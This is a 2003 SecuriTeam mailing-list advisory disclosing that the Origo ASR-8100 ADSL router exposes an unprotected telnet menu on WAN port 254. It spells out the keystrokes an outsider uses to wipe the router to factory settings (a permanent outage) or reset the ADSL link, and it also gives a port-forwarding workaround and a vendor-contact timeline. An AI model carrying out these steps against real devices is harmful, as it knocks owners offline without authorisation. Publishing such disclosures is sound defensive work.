[NEWS] Remote Origo ASR-8100 ADSL Reset and Permanent Denial of Service Attack
From: SecuriTeam (support_at_securiteam.com)
To: firstname.lastname@example.org Date: 23 Oct 2003 17:46:57 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
- - - - - - - - -
Remote Origo ASR-8100 ADSL Reset and Permanent Denial of Service Attack
The Origo ASR-8100 ADSL device can be remotely reset to factory settings,
allowing a permanent denial of service attack until it is reconfigured
manually by an operator. The attack only takes place after the device is
reset - which may be some time after it has been performed. PPP
authentication information is lost on reset to factory settings, so it is
most likely that the device will be unable to establish a WAN link after
The ADSL link can also be remotely reset, causing temporary DoS and (if
DHCP is used) its IP address to change.
Both of these do not require any special privileges (no administrative
password is required).
A telnet-style configuration interface is left open to the WAN interface
on port 254, without any form of protection on it (password protection).
Forwarding external port 254 to an internal port that is unused prevents
access to the configuration interface.
This can be done via the web interface by going to:
Click on Configuration: Virtual server
Enter a new entry:
Public port: 254
Private port: 9876
Host IP address: 127.0.0.1
Click 'Add this setting', then do Configuration: Save Settings/Reboot and
Click 'Save & Reboot'
From any Internet connected host:
telnet <router global IP address> 254
Returns a menu:
01/01/99 CONEXANT SYSTEMS, INC.
ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A)
You are prompted for a LOGIN PASSWORD>
Just press return
Brings up MAIN MENU
1. SYSTEM STATUS AND CONFIGURATION
2. ADSL MENU
4. REMOTE LOGON
Press 1 - get to SYSTEM STATUS AND CONFIGURATION
1. SYSTEM INFORMATION
2. SYSTEM CONFIGURATION
Press 2 - get to SYSTEM CONFIGURATION
1. CHANGE SYSTEM TIME
2. CHANGE SYSTEM DATE
3. CHANGE PASSWORD
4. FACTORY DEFAULT CONFIGURATION
Type 1 hh:mm:ss to reset the system time
Type 2 dd/mm/yy to reset the system date
(Option 3 doesn't work)
Type 4: Prompt: This will reset all the configurations and the ADSL modem.
Are you sure?(Y/N)
Type Y: Message: NVRAM updated
This does not reset the ADSL modem, only clears the NVRAM. This takes
effect the next time the modem is reset: the admin password is reset to
that printed in the documentation, and the ADSL username/password are
reset, meaning the connection is down permanently until a human sets them
up again. Any other settings (security etc) are also lost.
ADSL Link Reset:
From main menu, type 2 to get to ADSL MENU
1. ADSL PERFORMANCE STATUS
2. 24 HOUR ADSL PERFORMANCE HISTORY
3. 7 DAY ADSL PERFORMANCE HISTORY
4. ADSL ALARM HISTORY
5. ADSL TRANSCEIVER CONFIGURATION MENU
6. ADSL LINK RESET
Type 6: Prompt: This will bring down the ADSL link. Are you sure(Y/N)?
Type Y. The ADSL link is reset and a new WAN IP address is requested by
DHCP (if the ISP uses it).
UK support for Vendor (email@example.com) was notified on 30th August
2003 - entirety of reply message was 'Thanks a lot'. Vendor does not
advertise email addresses so were notified via web form on that date - no
response received. To date the vendor has not advertised any patches or
The information has been provided by <mailto:theo_@_markettos.org.uk>
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: firstname.lastname@example.org
In order to subscribe to the mailing list, simply forward this email to: email@example.com
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.